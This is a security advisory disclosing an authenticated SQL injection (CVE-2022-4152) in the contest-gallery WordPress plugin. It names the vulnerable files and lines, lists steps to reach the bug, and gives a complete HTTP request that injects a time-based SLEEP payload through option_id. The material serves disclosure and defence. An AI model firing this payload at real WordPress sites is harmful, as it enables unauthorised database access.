contest-gallery 19.1.4.1 WordPress plug-in SQL injection
Vulnerability Metadata
| Key | Value |
|---|---|
| Date of Disclosure | December 05 2022 |
| Affected Software | contest-gallery |
| Affected Software Type | WordPress plugin |
| Version | 19.1.4.1 |
| Weakness | SQL Injection |
| CWE ID | CWE-89 |
| CVE ID | CVE-2022-4152 |
| CVSS 3.x Base Score | n/a |
| CVSS 2.0 Base Score | n/a |
| Reporter | Kunal Sharma, Daniel Krohmer |
| Reporter Contact | k_sharma19@informatik.uni-kl.de |
| Link to Affected Software | https://wordpress.org/plugins/contest-gallery/ |
| Link to Vulnerability DB | https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4152 |
Vulnerability Description
The option_id GET query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An attacker with role of Author or above may abuse the Edit options functionality in edit-options.php. This leads to a threat actor crafting a malicious GET request.
Exploitation Guide
Create a New Gallery, if no gallery was created before.
Change the Gallery name.
Click on Edit gallery.
Click Edit options
Clicking Edit options triggers the vulnerable request, the option_id GET parameter is the vulnerable query parameter.
A POC may look like the following request:
In the application code, the vulnerability is triggered by un-sanitized user input of option_id at line 6 in ./v10/v10-admin/options/edit-options.php.
At line 233 in ./v10/v10-admin/options/edit-options.php the database query call on $galeryNR leads to SQL Injection.
Aditionally, at lines 99-110 in ./v10/v10-admin/export/export-votes-all.php the database query call on $galeryNR leads to SQL Injection.
Note: This database call will only execute for plugin version < 14.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below:
POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_options=true&option_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(2*3)))UrUZ) HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20111157931082033094578071609
Content-Length: 355
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668486148%7Ciue1BpD8DyhKzm4LMQskkHLzsz4TbknZXcqQlgI1eeS%7C62265def59372d372b5ba459780bd8c14c8b84a253c9fc70dd3de66ae361507f; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668486148%7Ciue1BpD8DyhKzm4LMQskkHLzsz4TbknZXcqQlgI1eeS%7C69c36f6ff952f3fc1a71c3dd81a707bc4ef0760f84d7c605b77639d98644b5d5; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668313348
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------20111157931082033094578071609
Content-Disposition: form-data; name="action"
post_contest_gallery_action_ajax
-----------------------------20111157931082033094578071609
Content-Disposition: form-data; name="cgBackendHash"
e12e8782da8ac6c4f1725d81a9811524
-----------------------------20111157931082033094578071609--